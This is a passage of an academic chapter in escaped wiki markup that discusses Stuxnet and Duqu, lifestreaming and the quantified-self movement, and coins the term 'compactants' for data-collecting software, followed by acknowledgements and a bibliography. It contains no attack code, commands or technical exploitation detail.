&amp;lt;br&amp;gt; The name Stuxnet origin is hypothesized from an analysis of the approximately 15,000 lines of programming code. This was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner, 2011). Indeed, as part of this process a reference to “Myrtus” was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan-&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized at targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But of course, once the code for undertaking this kind of sophisticated cyberattack is out in the wild it is relatively trivial to decode the computer code and learn techniques that would have taken many years of development in a very short time. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit with purposes linked to the collection of the data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the “Tilded” [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Lastly, I want to turn to connect these developments in web-bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years as the ‘real-time streams’ platforms have expanded, like Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', who argue that the, &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as “self-tracking”, “body hacking” or “self-quantifying”. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This phenomena of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. This closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband], for example, has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and &amp;quot;compress&amp;quot; large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Gelernter originally described these ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving the innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, which has short text-message sized 140 character updates. Nonetheless this is still enough text space to incorporate a surprising amount of data, particularly when geo, image, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect their data systematically.&amp;amp;nbsp;As he explains, Wolfram started in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that.&amp;amp;nbsp;Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions. The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- &amp;quot;Geraldine posted a photo to her album&amp;quot; or &amp;quot;John shared a video&amp;quot;. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and aggregative use case, in other words for the individual user (or lifestreamer) or organization (such as Facebook), the key is to pattern match and compare details of the data, such as against a norm, a historical data set, or against a population, group, or class or others.[13] &lt;br /&gt;
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages the user to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational care of the self, facilitated by an army of oligopticans (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining the meaning and narratives through a stabilisation and web of meaning for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself. Data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed there can be very productive knowledge generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand software ecologies such as these (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects to these systems is that humans in many cases become the vectors that both enable the data transfers carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks creates the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time whilst secreting themselves within our computer systems raises important questions. However, users are actively downloading apps that advertise the fact that they collect this data and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs in many ways are life streams. Albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' are designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to particularly draw attention to this passive-aggressive feature of computational agents that are collecting information. Both in terms of their passive quality – under the surface, relatively benign and silent – but also the fact that they are aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and compact as in conciseness in expression. The etymology from the Latin ''compact'' for closely put together, or joined together, also nearly expresses the sense of what web bugs and related technologies are. Compactants are also useful in terms of the notion of ''companion actants'' (see Haraway, 2003).&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that is often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, or server computers designed specifically for the task and accessed via networks. Indeed, many viruses, for example, often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
&lt;br /&gt;
We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the “future self” will be required to undo bad habits and behaviours of the present-self. That is, that there is an explicit normative context to a ''future'' self, who you, as the ''present'' self may be treating unfairly, immorally or without due regard to, what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal temporal representation of time within computational systems, that is time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
&lt;br /&gt;
There are many examples of how attending to the code and software that structures many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights into both our usage of code and software, but also the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not fully been incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attests. Of course, this code/software research is not easy, the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to the critical theorists, both of the present looking to provide critique and counterfactuals, but also ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0,Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture&amp;amp;nbsp;Desire, ''TechCrunch'',accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress,accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994. The cyber-road not taken. ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about) &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Harraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lunapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. S. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, _The Smithsonian_, accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
